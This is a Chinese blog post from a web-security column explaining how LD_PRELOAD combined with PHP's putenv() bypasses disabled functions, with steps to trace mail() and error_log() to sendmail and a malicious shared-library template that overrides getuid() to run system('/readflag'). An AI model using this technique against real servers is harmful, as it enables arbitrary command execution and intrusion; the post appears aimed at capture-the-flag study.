PRE_LOAD+putenv

最新推荐文章于 2023-06-12 11:54:15 发布
最新推荐文章于 2023-06-12 11:54:15 发布
阅读量920 收藏 1
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/oubasangdadada/article/details/104607122
版权

PRE_LOAD

在 linux 中, PRE_LOAD 可以定义预先加载的共享库文件。设置预先加载的库文件的方法:

  1. 编译一个共享库文件
gcc -c -fPIC test.c -o test
gcc -shared test -o test.so

-fPIC告诉编译器产生与位置无关代码,则产生的代码中使用的全部是相对位置而不是绝对位置,因此代码可以被加载到内存中的任意位置并且可以正确地执行,这是共享库要求的,共享库被加载的时候在内存中的位置是不一定的。
2. 通过 export 设置环境变量

export LD_PRELOAD=./test.so
  1. 一个实例
    编写一个文件 test.c
#include<sys/types.h>
#include<dlfcn.h>
#include<unistd.h>

uid_t geteuid(void) {return 0;}
uid_t getuid(void) {return 0;}
uid_t getgid(void) {return 0;}

按照上面的命令把文件编译成一个共享库文件,并且设置为环境变量,然后我们再执行id命令,得到的结果返回的 id 值会变成 0,也就是说我们的共享库文件被预先加载了

  1. 查看命令调用的共享库文件和库函数
ldd /usr/bin/id  # 查看命令调用的库文件
readelf -Ws /usr/bin/id  # 查看命令调用的库函数

我们一般是找到想要利用的命令调用的库函数,然后再库函数本来的原型上重新写一个带有攻击性的函数,并且将这个文件编译成共享库文件。

putenv

php 中一般使用 putenv 来设置环境变量

putenv("LD_PRELOAD=/var/www/html/test.so")

加上这一句话就达到了上面 export效果

一般的攻击流

只要找到可以利用的上层函数一般就可以利用了

  1. 找到调用这个上层函数时所要调用的系统进程
    在 linux 中,进程不能直接访问硬件设备,当进程需要访问硬件设备 (比如说从磁盘读取文件、读取网络数据)时,必须要通过系统调用。
strace # 可以跟踪进程执行时的系统调用和所接收的信息
-f # 这个参数可以跟踪到fork出来的子进程

假设我们跟踪的是 php 中的 mail()函数,创建下面的文件:

<?php
  mail("a","b","c","d");
?>

跟踪命令:

strace -f php mail.php 2>&1 | grep -A3 -B3 execve

可以看到子进程 /usr/sbin/sendmail

  1. 查看子进程调用的库函数
readelf -Ws /usr/sbin/sendmail

一般选择比较简单且常用的库函数来进行利用,比如说 void getuid(void){}
查看函数原型,然后再根据需要创建一个文件并且重写这个函数就行了。

  1. 上传.so 文件到网站,然后在文件中按下面的方式声明就好:
<?php
    putenv("LD_PRELOAD=/var/www/html/test.so");
    mail("a","b","c","d");
?>

最后访问这个 php 文件即可

如果网站 ban 掉了 mail()函数,我们可以关注 error_log()函数,这个函数向我们发送错误信息。

  1. error_log()函数
    一些情况下,phpbanmail函数,那么这种情况下,我们可以尝试以下errorlog()函数,这个函数有四个参数:
error_log(message, message_type, destination, extra_headers)

# message表示要记录的错误信息
# message_type主要有四类
#    0:发送到php系统日志
#    1:发送到参数destination设置的地址,第四个参数extra_headers只有在这个情况下会被用到
#    2:不再是一个选项
#    3:被发送到destination的地址
#    4:message直接发送到SAPI的日志处理程序
# destination是在message_type设为1或者3时message被发送的地址
# extra_headers只有在message_type设为1时才会被用到

这个函数的利用点就在于当 message_type 设为 1 时,extra_headers 会调用一个 mail()的内置函数,启动 sendmail 这个进程, 这个进程会调用 getuid()这个库函数。此时,我们就可以编写.so文件实现任意命令执行了。

  1. 一般的恶意共享库文件的格式
#include<stdlib.h>
#include<stdio.h>
#include<string.h>

void payload(){
  system("/readflag > result.txt");
}

int getuid(void){
  unsetenv("LD_PRELOAD");
  payload();
}

system函数中,我们就可以执行想要执行的命令了。

(如有侵权,联系删除)

yyvegetable
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基于Linux LD_PRELOAD机制的Profing工具
Hi20240217的博客
02-19 990
本文提供了一种不需要修改工程源码的Profing方法,它基于Linux的LD_PRELOAD机制,并且能拦截dlsym加载的函数.并且生成被拦截函数调用的timeline,用于分析耗时成分.可通过https://ui.perfetto.dev/或ChromeTrace可视化通过Timeline,可进一步分析,是否有空泡、耗时成分、是否充分overlap,协助优化用户程序。
C语言putenv()函数和getenv()函数的使用详解
09-03
本文将深入探讨两个用于环境变量操作的关键函数:`putenv()` 和 `getenv()`。 首先,我们来看`putenv()`函数。`putenv()`函数允许程序员动态地修改或创建一个新的环境变量。它的头文件是`<stdlib.h>`。函数的声明...
使用NSOperation和NSOperationQueue启动多线程
xianghuibeijing的专栏
04-08 776
在app store中的很多应用程序非常的笨重,他们有好的界面,但操作性很差,比如说当程序从网上或本地载入数据的时候,界面被冻结了,用户只能等程序完全载入数据之后才能进行操作。当打开一个应用程序时,iphone会产生一个包含main方法的线程,所用程序中的界面都是运行在这个线程之中的(table views, tab bars, alerts…),有时候我们会用数据填充这些view,现在问        题是如何有效的载入数据,并且用户还能自如的操作程序。方法是启动新的线程,专门用于数据的下载,而主线程不会
Linux 环境变量LD_PRELOAD
小立仔
06-12 3077
Linux 下使用 环境变量 LD_PRELOAD 简介以及使用其来 hook标准中的函数
Linux下的LD_PRELOAD环境变量与打桩
weixin_44966641的博客
10-29 2079
Linux下的LD_PRELOAD环境变量与打桩 LD_PRELOAD是Linux系统的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接,一方面,我们可以以此功能来使用自己的或是更好的函数(比如,你可以使用Google开发的tcmalloc来提升效率),而另一方面,我们也可以向别人的程序注入程序,从而达到特定的目的。 我们下面以一个 foepn() 函数的例子来展示一下如何实现运行时打桩。 正常函数调用 首先,我们建立一个测试目录
Linux LD_PRELOAD动态链接劫持
SHELLCODE_8BIT的博客
12-02 767
【代码】LD_PRELOAD
putenv与setenv的区别
05-24
`putenv`和`setenv`都是标准函数,用于修改或设置程序的环境变量。然而,这两个函数在处理环境变量的方式上存在一些差异,这使得它们在特定场景下各有优劣。 首先,`putenv`函数的独特之处在于它接受一个指向形如...
linux_c-code.zip_linux 文件操作_linux编程
09-14
- 在C程序中,可以使用`getenv()`函数获取环境变量的值,`putenv()`设置新的环境变量,`unsetenv()`则用于删除环境变量。 2. **接口处理**: - Linux提供丰富的系统调用接口供C程序使用,如`open()`, `read()`, `...
嵌入式web服务器boa_C语言/Python + HTML + javascript + ajax 代码实例例子
03-03
在嵌入式web服务器boa框架的基础上, ... boa服务器的相关配置参数说明: ... boa安装包文件名: boa-for-hi3516a....int putenv(const char * string); setenv(改变或增加环境变量) http://www.jb51.net/article/71940.htm
environ.rar_Linux/Unix编程_Unix_Linux_
08-11
在Linux和Unix系统中,程序可以通过`getenv()`函数获取环境变量的值,通过`putenv()`函数设置环境变量,以及通过`setenv()`和`unsetenv()`函数添加或删除环境变量。然而,这些操作通常不涉及权限检查,因为环境变量...
在linux中使用LD_PRELOAD加载自定义函数
choumin的专栏
09-04 1072
在 linux 中可以通过设置 LD_PRELOAD 环境变量来优先加载指定的动态,详情请见:https://www.man7.org/linux/man-pages/man8/ld.so.8.html。下面就记录一下它的基本用法——使用 LD_PRELOAD 旁路 libc 中的 memcmp。 1)实现自己的 memcmp(为提高效率,先以 8 字节块为大小进行比较,失配后进行逐字节比较) memcmp.c 的内容如下: #include &lt...
php ld preload,利用环境变量LD_PRELOAD来绕过php disable_function执行系统命令
weixin_35916239的博客
03-17 199
0x00 前言在做渗透测试的时候如果遇到安全配置比较好的服务器,当你通过各种途径获得一个php类型的webshell后,却发现面对的是无法执行系统命令的尴尬,因为这类服务器针对命令执行函数做了防范措施,后续的渗透行为都因此而止步。笔者这里分享一个绕过思路,希望你能在实际测试中派上用场。0x02 绕过思路严苛环境下php设置的disable_function如下: dlexecsystempa...
【Linux】LD_PRELOAD用法
热门推荐
Making Life Better. Making Others Better.
11-20 2万+
LD_PRELOAD,是个环境变量,用于动态加载,动态加载的优先级最高,一般情况下,其加载顺序为LD_PRELOAD&gt;LD_LIBRARY_PATH&gt;/etc/ld.so.cache&gt;/lib&gt;/usr/lib。程序中我们经常要调用一些外部的函数,以malloc为例,如果我们有个自定义的malloc函数,把它编译成动态后,通过LD_PRELOAD加载,当程序中调用malloc函数时,调用的
Linux之pre-cpu变量
fdaopeng的专栏
08-12 1522
在Linux系统中,per-cpu变量用在SMP系统中,用来为每个cp
Linux C C++静态、动态高级编程
最新发布
10-27
警惕UNIX下的LD_PRELOAD环境变量
walterxia的专栏
07-12 656
警惕UNIX下的LD_PRELOAD环境变量 转自 http://blog.csdn.net/haoel/article/details/1602108  陈皓 前言        也许这个话题并不新鲜,因为LD_PRELOAD所产生的问题由来已久。不过,在这里,我还是想讨论一下
有趣的 LD_PRELOAD
天涯路的专栏
06-10 1391
LD_PRELOAD 是 Linux 系统中的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接。如果你是个 Web 狗,你肯定知道 LD_PRELOAD,并且网上关于 LD_PRELOAD 的文章基本都是绕过 disable_functions,都快被写烂了。今天我们就从浅入深完整的学习一下什么是 LD_PRELOAD,LD_PRELOAD 有什么作用,我们可以如何利用 LD_PRELOAD。程序的链接主要有以下三种:对于动态链接来说,
linux系统的详细启动过程
weixin_34380948的博客
03-12 77
linux系统的详细启动过程http://www.aminglinux.com/bbs/forum.php?mod=viewthread&tid=7505&fromuid=4618(出处: 【阿铭Linux】)Linux系统从用户打开电源直到屏幕出现命令行提示符是一个很复杂的过程,其中要加载很多硬件信息与系统文件,下面就以RHEL5.X在x86平台上面的运行为...
proc_open,putenv 该如何正常使用
05-31
确实,`proc_open`和`putenv`是PHP中非常有用的函数,如果使用得当,它们可以为我们带来很多便利,下面我来介绍一下如何正常使用这两个函数: 1. `proc_open` 函数的正常使用: `proc_open` 函数的基本语法如下: ``` resource proc_open ( string $cmd , array $descriptorspec , array &$pipes [, string $cwd [, array $env [, array $other_options ]]] ) ``` 其中,`$cmd` 参数指定要执行的命令,`$descriptorspec` 参数指定文件描述符的配置,`$pipes` 参数是一个数组,用于存储命令的输入、输出和错误流, `$cwd` 参数指定命令执行的工作目录,`$env` 参数指定命令执行时的环境变量,`$other_options` 参数用于指定其他选项。 在使用 `proc_open` 函数时,需要注意以下几点: - `$cmd` 参数需要进行过滤和检查,以防止命令注入等安全问题; - `$descriptorspec` 参数需要进行正确的配置,以使命令的输入、输出和错误流能够正确的连接; - `$pipes` 参数需要正确的传递和使用,以便正确地获取命令的输出和错误信息; - `$cwd` 参数需要正确设置,以确保命令在正确的工作目录下执行; - `$env` 参数需要进行过滤和检查,以确保环境变量的安全性; - `$other_options` 参数需要根据具体情况进行配置,以满足特定的需求。 2. `putenv` 函数的正常使用: `putenv` 函数的基本语法如下: ``` bool putenv ( string $setting ) ``` 其中,`$setting` 参数是一个字符串,指定要设置的环境变量,格式为“变量名=变量值”。 在使用 `putenv` 函数时,需要注意以下几点: - `$setting` 参数需要进行过滤和检查,以确保环境变量的安全性; - 在使用 `putenv` 函数设置环境变量后,需要注意及时清理和更新环境变量,以免出现意外的影响; - 在使用 `putenv` 函数设置环境变量时,需要注意环境变量的作用范围和生命周期,以确保正确的使用。 总之,对于 `proc_open` 和 `putenv` 函数的正常使用,需要根据具体情况进行安全检查和过滤,并根据需要进行正确的配置和使用,以确保程序的安全性和正确性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值